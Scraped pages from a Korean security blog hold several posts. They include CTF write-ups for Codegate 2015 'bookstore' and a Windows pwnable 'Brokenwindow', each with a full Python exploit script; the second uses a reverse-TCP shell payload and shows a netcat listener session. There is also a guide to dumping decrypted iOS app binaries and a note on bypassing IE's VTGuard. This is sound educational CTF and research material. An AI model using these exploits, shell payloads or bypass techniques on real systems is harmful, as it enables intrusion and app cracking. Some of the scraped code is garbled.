아까 말했듯이 구조체를 지역변수로 만들 경우 스택에 일정 공간을 잡아두고 그 곳에 데이터를 채워 넣는 방식이라고 했다.
사용할 스택을 미리 예측해서 그 부분에 Stack Spray(?)를 해놓고 나중에 구조체가 그 스프레이된 곳에서 세팅하도록 유도한다면 어떨까?
문제 내에서는 이유없이 이상하게 3000바이트를 받고 약 200바이트 약간 안되게 잘라서 다시 넣는 부분이 있을 것이다.
사실 풀어본 사람은 알겠지만 그 부분이 바로 스택 스프레이를 하는 부분이다.
그렇다면 다시 살펴보자.
위와 같은 구조체가 있다고 하고 스택영역에 할당될 예정이다.
그전에 미리 3000바이트 정도 스택영역에 스프레이를 해두면 실제 구조체를 만들 당시 아무 값도 초기화 하지 않을 경우 아래그림과 같은 상태일 것이다.
위는 스택 스프레이가 진행된 모습이다.
그래서 구조체를 세팅하다보면 아까와는 달리 초기화 하지 않은 일부 0인 부분이 AAAA 로 변한 모습이 보일 것이다. (s3는 잘못 색칠한것임! 원래 AAAA임!, s4는 위에 언급했듯이 원래 0값으로 가정.)
위와 같이 내 맘대로 원하는 구조체를 저렇게 바꿔버리면 프로그램의 흐름을 바꿀 수 있다.
그래서 탄생한 Exploit 은 다음과 같다.
#Exploit
from socket import *
import struct
import os
p = lambda x : struct.pack(" ip = "0.0.0.0" # blind port = 31337 print "[*] CODEGATE 2015 bookstore exploit." print "[*] Start Exploit." s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) def r(s): result = "" try: while 1: s.settimeout(0.1) tmp = s.recv(1) result = tmp if len(tmp) == 0: #print tmp break except: pass return result #def s(s, a): # s.sendall(a) print r(s) s.sendall("helloadmin") print r(s) s.sendall("iulover!@#$"); #print r(s) for i in range(0, 3): #s.recv(1024) #s.recv(1024) print r(s) # s.sendall("1") # s.recv(1024) s.sendall("1\n") print r(s)#s.recv(1024) s.sendall("AAAAA") print r(s)#s.recv(1024) #s.recv(1024) s.sendall("AAAAA") print r(s)#s.recv(1024) #s.recv(1024) s.sendall("0\n") # s.recv(1024) # s.sendall(str(0x42424242) "\n") # s.recv(1024) # s.sendall(str(0x42424242) "\n") print r(s) s.sendall("2\n") # into modify option print r(s) s.sendall("1\n") # target index print r(s) #s.recv(1024) s.sendall("3\n") # modify all s.recv(1024) print r(s) s.sendall(str(0x42424242) "\n") print r(s) #s.recv(1024) s.sendall(str(0x42424242) "\n") print r(s) s.sendall("1\n") # modify all print r(s) s.sendall("1\n") # modify all print r(s) s.sendall("A"*20) print r(s) s.sendall("C"*30) print r(s) s.sendall("0\n") # exi print r(s) s.sendall("4\n") # show list leak = r(s) #leak = s.recv(1024) b = leak.split("AAAAAAAAAAAAAAAAAAAABBBBBBBB")[1][:4] point = ((struct.unpack(" print "[*] LEAKED Memory : " str(hex(point)) s.sendall("2\n") # into modify option print r(s) s.sendall("0\n") # target index print r(s) s.sendall("1\n") # modify bookname print r(s) s.sendall("A"*30) print r(s) import time s.sendall("2\n") # modify bookdescription print r(s) time.sleep(0.3) s.sendall(p(point)*(2800/4)) time.sleep(0.3) print r(s) s.sendall("3\n") # create vuln object print r(s) s.sendall(str(0x42424242) "\n") print r(s) s.sendall(str(0x42424242) "\n") print r(s) s.sendall("0\n") # free shipping print r(s) s.sendall("1\n") # now avaliable print r(s) s.sendall("/home/bookstore/key") # s.sendall("/home/sweetchip/key") print r(s) s.sendall("A") print r(s) s.sendall("4\n") # change free shipping option print r(s) s.sendall("1\n") print r(s) s.sendall("0\n") # back to main menu print r(s) s.sendall("4\n") # show list print r(s) s.sendall("3\n") # item info print r(s) s.sendall("0\n")#index print r(s) #print "[*] Key is : " r(s).split("====================================================================")[0].split("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n")[1].replace("\n", "") s.close()
곧바로 다음 포스팅은 본선에 출제된 bookstore2...
감사합니다.
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| Defcon 2015 coding challenge write-up (0) | 2015.05.18 |
|---|---|
| Codegate 2015 Bookstore2 Write-up [Exploit] (2) | 2015.04.18 |
| Codegate 2015 Bookstore Write-Up [Exploit] (0) | 2015.04.17 |
| CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) | 2014.02.25 |
| CodeGate 2014 PreQual CloneTechnique (2) | 2014.02.25 |
| CodeGate 2014 PreQual 120 Write Up (0) | 2014.02.25 |
Comment 0
안녕하세요.
요즘 학교 6시간 연강에 고통받으랴 회사일 개인연구.. 등등에 고통받고 있느라 블로그를 잘 못하게 되네요..
얼마전에 IOS에 대해서 연구를 하고싶은게 있어서(라고 썻지만 가지고 놀려고..) 아이패드를 구입하게 되었는데 IOS 앱 바이너리를 추출해보고 싶었습니다.
우선 아이패드의 운영체제인 IOS 8 기준으로 앱스토어에서 다운로드 받은 어플리케이션들은 모두 암호화 되어있다고 합니다.
그래서 실행할 경우 언패킹 과정을 거쳐 메모리에 원본 바이너리를 올린 뒤에 실제 프로그램 루틴이 실행 된다고 하는데, 자세한 원리는 아래 링크를 참고해보시면 되겠습니다.
[IOS Tutorial #1] IOS App 암호화 해제하기 (Decrypting IOS App Binary Encryption) On IOS 6.1.3
- http://repo.kr/0x04-ios-penetration-testing/decrypting-ios-app-binary-encryption-on-ios-6-1-3/
자, 이제 앱 원본 바이너리를 추출해 봅시다.
/*
* 이 포스팅은 IOS 연구를 하시는 분들을 위하여 작성된 게시물 입니다.
* 해당 포스팅을 이용하여 불법적으로 상업적인 이득을 취하거나 그 외 법적으로 문제가 발생할 경우 책임은 본인에게 있음을 알려드립니다.
*/
먼저 준비물은 맥북(Mac os가 설치된 컴퓨터), Root 권한을 얻은 아이폰이나 아이패드 등의 IOS가 설치된 기기가 필요합니다.
또한 아래는 IOS 8.1 기준으로 진행한 방법입니다.
우선 바이너리를 추출하고 복호화 하는 방법은 여러가지가 있지만 그 중 대표적인 방법은 실행된 바이너리를 GDB로 붙여서 메모리 덤프를 해서 실행 파일로 만드는 것입니다.
하지만 이 과정도 상당히 귀찮은 면이 많기때문에 stefan esser 라는 외국 짱짱해커분이 만들어두신 dumpdecrypted 로 비교적 쉽게 덤프가 가능합니다.
https://github.com/stefanesser/dumpdecrypted 의 프로젝트를 다운로드 받고 make 명령어로 dylib 파일을 생성합니다.
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump$ git clone git://github.com/stefanesser/dumpdecrypted
Cloning into 'dumpdecrypted'...
remote: Counting objects: 31, done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 31
Receiving objects: 100% (31/31), 6.50 KiB | 0 bytes/s, done.
Resolving deltas: 100% (15/15), done.
Checking connectivity... done.
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump$ ls
dumpdecrypted
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump$ cd dumpdecrypted/
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump/dumpdecrypted$ ls
Makefile README dumpdecrypted.c
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump/dumpdecrypted$ make
`xcrun --sdk iphoneos --find gcc` -Os -Wimplicit -isysroot `xcrun --sdk iphoneos --show-sdk-path` -F`xcrun --sdk iphoneos --show-sdk-path`/System/Library/Frameworks -F`xcrun --sdk iphoneos --show-sdk-path`/System/Library/PrivateFrameworks -arch armv7 -arch armv7s -arch arm64 -c -o dumpdecrypted.o dumpdecrypted.c
`xcrun --sdk iphoneos --find gcc` -Os -Wimplicit -isysroot `xcrun --sdk iphoneos --show-sdk-path` -F`xcrun --sdk iphoneos --show-sdk-path`/System/Library/Frameworks -F`xcrun --sdk iphoneos --show-sdk-path`/System/Library/PrivateFrameworks -arch armv7 -arch armv7s -arch arm64 -dynamiclib -o dumpdecrypted.dylib dumpdecrypted.o
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump/dumpdecrypted$ ls
Makefile README dumpdecrypted.c dumpdecrypted.dylib dumpdecrypted.o
sweetchip@sweetchipui-MacBook-Pro:~/Desktop/dump/dumpdecrypted$ scp ./dumpdecrypted.dylib root@[192.168.0.44]:/var/root
The authenticity of host '192.168.0.44 (192.168.0.44)' can't be established.
RSA key fingerprint is 7b:dd:df:de:4c:3d:cb:93:04:91:b2:99:88:37:6e:c3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.44' (RSA) to the list of known hosts.
root@192.168.0.44's password:
dumpdecrypted.dylib 100% 193KB 192.9KB/s 00:00
그리고 만들어진 파일을 scp로 제 아이패드에 복사시킵니다.
그후 아이패드 SSH에 접속합니다.
hyeonseong-won-ui-iPad:~ root# DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib /private/var/mobile/Containers/Bundle/Application/00000000-0000-0000-0000-000000000000/appname.app/appname mach-o decryption dumper
mach-o decryption dumper
DISCLAIMER: This tool is only meant for security research purposes, not for application crackers.
[ ] detected 32bit ARM binary in memory.
[ ] offset to cryptid found: @0xb9a08(from 0xb9000) = a08
[ ] Found encrypted data at address 00004000 of length 13877248 bytes - type 1.
[ ] Opening /private/var/mobile/Containers/Bundle/Application/00000000-0000-0000-0000-000000000000/appname.app/appname for reading.
[ ] Reading header
[ ] Detecting header type
[ ] Executable is a plain MACH-O image
[ ] Opening appname.decrypted for writing.
[ ] Copying the not encrypted start of the file
[ ] Dumping the decrypted data into the file
[ ] Copying the not encrypted remainder of the file
[ ] Setting the LC_ENCRYPTION_INFO->cryptid to 0 at offset a08
[ ] Closing original file
[ ] Closing dump file
hyeonseong-won-ui-iPad:~ root# ls
Application Support appname.decrypted Library dumpdecrypted.dylib
/private/var/mobile/Containers/Bundle/Application/ 경로에 보시면 현재 설치된 앱 바이너리들이 있는데 이는 find 명령어 등으로 정확한 위치를 알아내신 뒤,
위와같이 커맨드를 입력합니다. 그러면 자동으로 디크립션된 앱을 통째로 덤프 떠주면서 마지막으론 appname.decrypted 라는 파일을 뱉어냅니다.
그 후 IFunBox 등의 유틸이나 scp 등을 이용하여 프로그램을 추출하시면 복호화된 원본 바이너리를 얻을 수 있습니다.
이 과정으로 GDB를 붙이는 것에 비하여 비교적 간단하게 어플을 가져올 수 있었습니다.
끝!
참고 링크 1 : http://blog.l4ys.tw/2014/01/dump-ios-app-headers.html
참고 링크 2 : https://github.com/stefanesser/dumpdecrypted
'0x10 정보보안 > 0x14 Reverse Engineering' 카테고리의 다른 글
| 멀티 아키텍쳐 지원 어셈블러 Keystone (0) | 2016.06.08 |
|---|---|
| 윈도우 XP, 7에서의 WINDBG 를 이용한 Kernel Debugging (커널 디버깅) (3) | 2015.06.21 |
| IOS 앱 원본 바이너리 추출 및 복호화 - dumpdecrypted (10) | 2015.03.09 |
| [Fuzzer 만들기 프로젝트!] Pydbg 한번에 설치하기 (2) | 2013.10.04 |
| NewHeart 2013 Write ups - reversing (1) | 2013.05.29 |
| Reversing.kr FPS Write-up (9) | 2013.05.27 |
Comment 10
기술문서 - Introduction to IE's memory protection
오랜만의 기술문서를 배포하게 되었습니다.
화이트해시, 그레이해시 인턴 과정을 거치면서 연구했던 IE의 보호기법과 현재 나와있는 우회법을 간단하게 정리했습니다.
기술에서 테크니컬한 내용은 자세하게 다루지 않았습니다. 대신 중간중간 참고할만한 링크도 함께 걸어두었습니다.
도움이 되었으면 좋겠습니다.
* 틀린점이 있다면 sweetchip@sweetchip.kr 이나 아래 댓글로 달아주시면 감사하겠습니다.
- https://beistlab.wordpress.com/2015/01/15/grayhash_ie_memory_protection/
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
| KMPlayer 3.6.0.87 Exploit (4) | 2015.11.12 |
|---|---|
| 기술문서 - Introduction to IE's memory protection (0) | 2015.01.15 |
| [POC] Power Of XX 여성해킹대회 본선 - Brokenwindow (7) | 2014.11.09 |
| [Memory Protection] Internet Explorer - VTguard에 대하여 (2) | 2014.08.20 |
| CVE-2012-4792 IE Use-After-Free Analysis and Exploit (2) | 2014.04.26 |
| 2014 CodeGate Junior PreQual - Lotto (1) | 2014.02.16 |
Comment 0
[POC] Power Of XX 여성해킹대회 본선 - Brokenwindow
블로그 포스팅을 너무 오랫동안 안했네요!!...
그동안 바쁘긴 했는데.. 그래도 뭐좀 쓰자 해서.. 얼마전에 출제한 문제의 write-up이 적절할 것 같아서 쓰기로 했습니다!
14년 11월 6일부터 7일! 2일간 POC 컨퍼런스가 있었습니다.
[위는 POC에서 얻은 것들.. 이번 입장권은 이쁘네요.. ㅎㅎ]
그리고 POC 이벤트 행사 중 여성해킹대회인 POWER OF XX 본선 경기가 있었습니다.
POX는 숙명여대 SISS와 HackerSchool - Wiseguys 팀이 함께 진행하는 행사였고 저는 작년과 마찬가지로 문제 출제를 담당했습니다.
아쉽게도 이번엔 바쁜일이 많아서 문제를 1개밖에 출제하지 못했었네요.. ㅠㅠ
아무튼 이번에 제가 출제했던 분야는 Pwnable이고 특이하게도 리눅스에서의 Pwnable이 아닌 윈도우에서의 Pwnable 문제입니다.
주로 리눅스보다 윈도우에서 시스템 해킹분야를 공부하다 보니 나름[?] 신선하겠다 해서 출제를 결심하게 되었습니다.
게다가 본선 진출팀중에서 윈도우 시스템 해킹을 공부했던 분이 몇분 있는걸로 알고 있고, 또 문제도 그리 어렵게 내지는 않을거라서 별 문제 없겠다 생각했습니다.
Binary :
Description :
Can you Break Windows?
Key Example : flag{this_is_flag} -> this_is_flag
[Pwnable]
ASLR은 메모리 배치를 무작위로 해서 Exploit을 어렵게 하는것이고 Stack Cookie는 BOF를 체크하는 문제입니다.
4가지 보호기법 모두 컴파일러에 기본적으로 적용되어 있는 메모리 프로텍션들입니다.
하지만 난이도를 조절하기 위하여 일부 보호기법을 해제했습니다.
문제 컨셉은 제로데이 마켓입니다. (뭘 할까 하다가..)
sub_401000 proc near
var_4= dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp var_4], ecx
mov eax, [ebp var_4]
mov dword ptr [eax], 5 ; my_zeroday
mov ecx, [ebp var_4]
mov dword ptr [ecx 4], 2710h // 10000
mov edx, [ebp var_4]
mov dword ptr [edx 328h], offset sub_401070 // Function Pointer
mov eax, [ebp var_4]
mov esp, ebp
pop ebp
retn
우선 구조체를 설정하는 부분입니다.
위를 다시 코드로 정리해보면 아래와 같습니다
typedef struct st
{
int my_zeroday = 5;
int money = 10000;
??? // char description[500];
??? // char name[300]; - 두 값 모두 보이지는 않지만 실제론 이렇게 되어있습니다.
void* func_ptr = &sub_401070;
}st;
그리고..
sub_401070 proc near
push ebp
mov ebp, esp
push offset aThankYou_HaveA ; "[*] Thank you. Have a nice day\n"
call _puts
add esp, 4
pop ebp
retn
구조체 중 Function Pointer를 보면 단순하게 '고맙습니다, 좋은하루 되세여' 라는 뜻의 문장을 출력해주는 함수입니다.
이 다음부턴 급 귀찮아지니 우리의 친구 F5를 사용하겠습니다
signed int __cdecl sub_401090()
{
int v0; // eax@1
void (*v2)(void); // [sp 4h] [bp-370h]@0
int v3; // [sp 8h] [bp-36Ch]@5
int v4; // [sp Ch] [bp-368h]@1
int v5; // [sp 10h] [bp-364h]@6
char v6; // [sp 14h] [bp-360h]@13
char v7; // [sp 208h] [bp-16Ch]@13
void (*v8)(void); // [sp 334h] [bp-40h]@8
char WideCharStr; // [sp 338h] [bp-3Ch]@5
char v10; // [sp 33Ch] [bp-38h]@16
v0 = sub_40138A();
setvbuf((FILE *)(v0 32), 0, 4, 0);
sub_401000(&v4);
while ( dword_4154E4 < 30 )
{
dword_4154E4;
if ( dword_4154E4 > 50 )
exit(0);
sub_401030();
puts("> ");
sub_40A587(0, (LPWSTR)&WideCharStr, 2u);
v3 = sub_402175(&WideCharStr);
if ( v3 == 1 )
{
if ( v5 >= 5000 )
{
v5 -= 5000;
puts("[*] You bought a new 0day! and paid 5000won.");
v2 = v8;
v8();
}
else
{
puts("[-] You don't have any money. Go back..");
}
}
else if ( v3 == 2 )
{
if ( v4 >= 1 )
{
puts("[ ] Input Vulnerability Title : ");
sub_40A587(0, &::WideCharStr, 0x12Cu);
memmove(&v7, &::WideCharStr, 0x12Cu); // Information Leak
puts("[ ] Input Details about your 0-day: ");
sub_40A587(0, &word_4151C0, 0x1F4u);
memmove(&v6, &word_4151C0, 0x1F4u);
sub_40147B("[*] Title : %s\n[*] DESC : %s\n", (unsigned int)&v7);
puts("[*] Thank you! you got 3000Won");
((void (__cdecl *)(void (*)(void), void (*)(void)))v8)(v8, v2);
v5 = 3000;
--v4;
}
else
{
puts("[-] Hmm, I don't have any zeroday..");
}
}
else
{
if ( v3 == 3 )
{
puts("[ ] HELLO? : ");
sub_40167F("%s", (unsigned int)&v10); // scanf BOF!!
puts("[*] YOU GOT PWNED :)");
return 1;
}
if ( !v3 )
{
puts("[-] bye");
return 1;
}
puts("[?] WTF");
}
}
return 1;
}
우선 코드를 간단하게 정리해보면
처음 메뉴 1,2,3 을 출력하고 각 선택할때 분기문으로 흘러갑니다.
1번 분기는 제로데이를 구입하는것이고
2번 분기는 제로데이를 판매하는데 title과 description을 적습니다. 그리고 임시로 전역변수에 담고 이후 구조체변수에 담습니다.
3번 분기는 제로데이를 마음껏 사용하는 메뉴입니다.
하나하나 살펴보면..
3번 분기에서 scanf와 %s로 인하여 Buffer Overflow 취약점이 발생하고 Return Address를 덮어쓸 수 있습니다.
하지만! 아까 처음 보호기법에 의하면 ASLR과 Stack Cookie가 적용되어 있기 때문에, 리턴어드레스를 덮어씌우는 것 만으로는 부족합니다.
하지만! DEP가 설정되어있지 않기 때문에 쉘코드 실행은 간단하죠!
하지만! 쉘코드를 어디에 둬야 하는지 약간 의문이 들기도 합니다. 이것에 대한 답은 2번 분기에서 Vuln Title과 Description을 적는곳이 있었는데
이부분에 잠시 전역변수에 값을 담고 구조체로 옮기기 때문에 전역변수에 쉘코드를 담는다면 다른 메뉴로 가도 여전히 쉘코드가 남아있을 것입니다.
이때 전역변수의 값은 Base address offset 이고, offset은 일정하기 때문에 Base Address만 구해주면 문제를 간단하게 해결할 수 있습니다.
또한 이때 Base Address는 2번 메뉴의 memmove 함수로 인하여 구조체의 Function Pointer의 값을 유출할 수 있습니다. (Info Leak)
마지막으로 Stack Cookie 보호기법이 있기때문에 Return Address의 값을 손상시켜도 EIP가 제대로 컨트롤 되지 않을 것입니다.
이는 SEH Overwrite를 이용하여 우회할 수 있습니다. 간단하게 설명하면 SE Handler 값을 변조시키고 의도적으로 Exception을 발생하면 EIP 변경이 가능합니다.
자세한건 검색!
써놓고보니 복잡하지만 다시 정리하면
1. BOF 취약점
2. 전역변수에 쉘코드를 담고
3. Info Leak으로 Function Pointer의 값을 유출 시켜 Base Address를 구한뒤
4. SEH Overwrite로 전역변수 위치(Base Address offset)로 EIP 변조
위 과정을 거치면 쉘을 딸 수 있습니다.
#exploit.py
from socket import *
import threading
import time
import struct
up = lambda x : struct.unpack(" p = lambda x : struct.pack(" def payload(): # metasploit # use payload/window/shell_reverse_tcp # bad char : 0x00 0xff 0x0a 0x0d 0x1a shellcode =( 삭제 ) result = "" result = "\x90"*50 result = shellcode return result def bad(): result = "" for i in range(1, 26): result = chr(i) return result ip = "192.168.0.93" port = 1337 s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) time.sleep(0.1) print s.recv(2048) s.send("2") print s.recv(4096) s.send("A"*300) time.sleep(0.1) print s.recv(4096) p = payload() "A"*(500-len(payload())) s.send(p) time.sleep(0.1) temp = s.recv(40960) ptr = temp.split("A"*300)[1].split("[*]")[0].replace("\x0d\x0a","")[0:4] # RAW memor (leaked) print temp if len(ptr) == 3: ptr = "\x00" print ptr.encode("hex") print "base address : " hex(up(ptr)&0xffff0000) print "shellcode address : " shellptr = ((up(ptr)&0xffff0000) 0x151c0 0x20) s.send("3") time.sleep(0.1) print s.recv(4096) exploit = "A"*116 exploit = struct.pack(" exploit = "D"*10000 s.send(exploit) s.close()
확률은 거의 90% (aslr 때문에..)로 작동합니다.
C:\Users\sweetchip\Desktop>exploit.py
[-]*********************************************************************
[*] WELCOME TO ZERODAY MARKET. SELECT MENU :)
[ ] 1.BUY ZERODAY
[ ] 2.SALE ZERODAY
[ ] 3.USE ZERODAY
[ ] 0.EXIT
[-]*********************************************************************
>
[ ] Input Vulnerability Title :
[ ] Input Details about your 0-day:
[*] Title : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp2롤?
[*] DESC : 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱柏?$??B?O1r꺜
r캠??塢까??J次.gx蝕?,理?
홃뱩?
DR?눛씵xsN??;㎯!|0?궃ㅨ괺\Td?0?k6?섏}?=}穗???笠잶
렁[?\쎒V盖梓?벣앵E냰?꺢??
j픽]$괼7냟y?樺?}%a곽p?lu?z2 <1???&W힅?2샹-~zT\程Z?:AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp2롤?
[*] Thank you! you got 3000Won
[*] Thank you. Have a nice day
[-]*********************************************************************
[*] WELCOME TO ZERODAY MARKET. SELECT MENU :)
[ ] 1.BUY ZERODAY
[ ] 2.SALE ZERODAY
[ ] 3.USE ZERODAY
[ ] 0.EXIT
[-]*********************************************************************
>
70101e01
base address : 0x11e0000L
shellcode address :
[ ] HELLO? :
C:\Users\sweetchip>nc -lvp 31337
listening on [any] 31337 ...
connect to [192.168.0.93] from [Blind] [192.168.0.93] 62851
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
K:\prob_server>dir
dir
K 드라이브의 볼륨: [Blind]
볼륨 일련 번호: A497-E7DC
K:\prob_server 디렉터리
2014-11-09 오후 09:02
2014-11-09 오후 09:02
2014-11-06 오전 09:50 84,992 brokenwindow.exe
2014-11-06 오전 10:22 45 key.txt
2014-11-06 오전 09:50 75,264 loader.exe
2014-11-03 오전 11:09 32 run.bat
4개 파일 160,333 바이트
2개 디렉터리 5,296,316,416 바이트 남음
K:\prob_server>type key.txt
type key.txt
flag{Only_True_Love_Can_Break_Frozen_Windows}
K:\prob_server>
Key : Only_True_Love_Can_Break_Frozen_Windows
키는 POC 2014에서 passket & SNE, "Only True Love Can Thaw frozen SCADA Systems" 의 발표제목을 참고했습니다. ㅋㅋ
음...
끝!! ㅋㅋ
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
| KMPlayer 3.6.0.87 Exploit (4) | 2015.11.12 |
|---|---|
| 기술문서 - Introduction to IE's memory protection (0) | 2015.01.15 |
| [POC] Power Of XX 여성해킹대회 본선 - Brokenwindow (7) | 2014.11.09 |
| [Memory Protection] Internet Explorer - VTguard에 대하여 (2) | 2014.08.20 |
| CVE-2012-4792 IE Use-After-Free Analysis and Exploit (2) | 2014.04.26 |
| 2014 CodeGate Junior PreQual - Lotto (1) | 2014.02.16 |
Comment 7
-
이거 푼 팀이 있음?ㅋㅋㅋㅋㅋㅋㅋㅋ
- ㄴ
오랜만의 포스팅!
지난번 데프콘에 갈 기회가 생겨서 다녀오게 되었는데 귀국후 바로 인코그니토 CTF와 친척들과의 휴가, 그리고 인코그니토 발표까지
대략 2주동안 힘들게 지낸끝에 모든일이 끝났다 ㅎㅎ..
2월 말까지 BOB 프로젝트로 웹브라우저 취약점 헌팅과 7월 말까지 WhiteHash를 진행하게 되면서 다시 한번 웹브라우저 취약점 헌팅에 도전하면서
IE를 분석하게될 일이 있었는데 VTGuard에 대해서 몇글자 써보려고 한다.
IE 10부터 VTGuard가 적용되었는데 이는 IE만의 Memory Protection중 하나이다.
VTGuard의 원래 이름은 Vtable Guard인데 원래 Vtable에 있어야 하는 일정한 쿠키값과 현재 Vtable의 쿠키값을 비교해서 무결성을 체크하는 기법이다.
그 원리에 대해서 간단하게 알아보자
우선 mshtml.dll의 내부를 뜯어보면 __vtguard 라는 함수가 자리를 차지하고 있는데 함수의 내용을 살펴보면
mov edi, edi
int 3
retn
이 끝이다. 처음 봤을때는 이게 진짜 끝인가 하고 이름을 좀더 추측해서 여러가지를 찾아봤지만 이 vtguard 함수가 끝이다.
그러다가 xref를 살펴보니 엄청나게 많은 양의 참조가 있는것을 보았는데 대부분 사용되는 것은 구조체안의 또다른 구조체 어느 값(vtable값중 일부)과 vtguard의 주소를 비교하는 것을 볼 수 있다.
이처럼 처음 mov ecx, [esi] 로 vtable의 pointer를 얻어오고 cmp dword ptr [ecx 328h]로 vtable cookie를 확인하는 것을 볼 수 있다.
간단하게 다시 글로 나타내면
|ptr to vtable| ???? | ???? | ???? | ???? | ???? | <- Heap Object
ㄴ|????|????|????|????|????|cookie| <- Vtable
대략 이런 형태로 볼 수 있는데, 이때 cookie 값에는 mshtml이 로드된 뒤, (base address offset __vtguard) 의 값이 저장되어 있을 것이다.
그렇다면 어떤 효과가 있을까?
Heap Overflow에서는 효과가 적을 수도 있겟지만, Use After Free 취약점에 대해서는 어느정도 방어가 가능하다.
만약 위 그림의 .text:636dc10f의 ESI 레지스터가 Free된 Object의 포인터이고 공격자가 Object의 내용을 조종한 상태라고 가정한다.
또한 정상적인 Heap object와 vtable에는 각각 정상적인 ptr to vtable값과 cookie값이 들어가 있을 것이다.
------------------------------------------------------------------------------------------
정상적인 Heap Object
|Ptr to vtable (0x100a324b)| ???? | ???? | ???? | ???? | ???? | <- Heap Object
ㄴ|????|????|????|????|????|cookie (0x63d2dfb4)| <- Vtable
------------------------------------------------------------------------------------------
UAF 취약점으로 인하여 변조된 Heap Object
|Ptr to vtable (0x12121212)| 0x12121212 | 0x12121212 | 0x12121212 | 0x12121212 | 0x12121212| <- Fake Heap Object
ㄴ|0x0c0c0c0c|0x0c0c0c0c|0x0c0c0c0c| ... |0x0c0c0c0c|cookie(0x0c0c0c0c)| <- Fake Vtable
------------------------------------------------------------------------------------------
Object를 0x12121212 로 채워넣고 0x12121212 주소에는 0x0c0c0c0c가 채워져있다.
이 상태로 Vtguard 루틴으로 들어갈 경우 cmp dword ptr [ecx 328], offset __vtguard 부분에서 걸러지고
이후 프로세스가 혼자 죽어버린다.
엄청난 우회법은 현재 나와있지 않은 상태이다.
하지만 Vtguard는 __vtguard 함수의 주소를 Cookie로 사용하고 있기때문에 Information disclosure 버그로 mshtml의 Base Address 주소와
현재 mshtml 버전의 __vtguard 함수의 Offset만 더해서 구해주고 Fake Vtable에 삽입하면 된다.
하지만 말처럼 Information disclosure 버그를 찾는게 쉬운게 아니라서 조금더 간단한 방법을 찾아봐야 한다.
일단 Vtguard는 모든 Vtable에 대하여 적용된 것이 아니다.
또한 vtguard 체크 부분은 함수 실행 직전에 존재하며 함수 실행 여부는 이전의 분기문에서 결정된다.
또한 Heap object에는 생각보다 많은 정보를 담고 있다. 예를들어 다른 object의 주소같은것도 포함되어있다.
그러므로 UAF가 발생하고 Fake Object를 제작한 다음
vtable 함수 호출 분기문 이전에 여러 분기문으로 옮겨 다닐 수 있다면 Vtguard에 영향받지 않을 수도 있다는 것이다.
왜냐하면 조금전에 Vtguard는 모든 Vtable에 대해서 적용되지 않았기 때문에 아래와 같은 일이 일어날 수 있다.
|ptr to vtable| Heap object | ???? | ???? | ???? | ???? | <- Heap Object
ㄴ|????|????|????|????|????|cookie| <- Vtable
Object가 만약 이렇게 구성되어 있고 운이 좋다면 Heap object 를 사용하는 분기문으로 이동 할 수도 있다.
|ptr to vtable| ???? | ???? | ???? | ???? | ???? | <- Heap object
ㄴ|????|????|????|????|????|????| <- Vtable
그리고 이처럼 그 Object는 Vtguard가 적용되지 않은 Vtable의 주소를 가지고 있으면 게임 끝이다. (vtguard는 일부에만 적용된 것이므로 은근 이런 case가 간혹 있다. 끝까지 잘 찾아보자.)
이로써 (운이 좋으면) Vtguard에 영향을 받지 않고도 EIP Control이 가능하다.
Conclusion.
운이 좋으면 Vtguard에 영향받지 않고 EIP를 바꿔버릴 수 있다. 포기하지 말고 끝까지 살펴보자.
Reference
http://neilscomputerblog.blogspot.kr/2014/04/vtguard.html
만약 틀린 정보가 있으면 댓글 달아주시면 감사하겠습니다. (졸면서 글을 쓰고 있네요.. 틀린점이 있을지도.. ㅋㅋ )
바로 수정하겠습니다!
ps. 같이 연구하면서 도움을 주신 몽형 감사합니다.
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
| 기술문서 - Introduction to IE's memory protection (0) | 2015.01.15 |
|---|---|
| [POC] Power Of XX 여성해킹대회 본선 - Brokenwindow (7) | 2014.11.09 |
| [Memory Protection] Internet Explorer - VTguard에 대하여 (2) | 2014.08.20 |
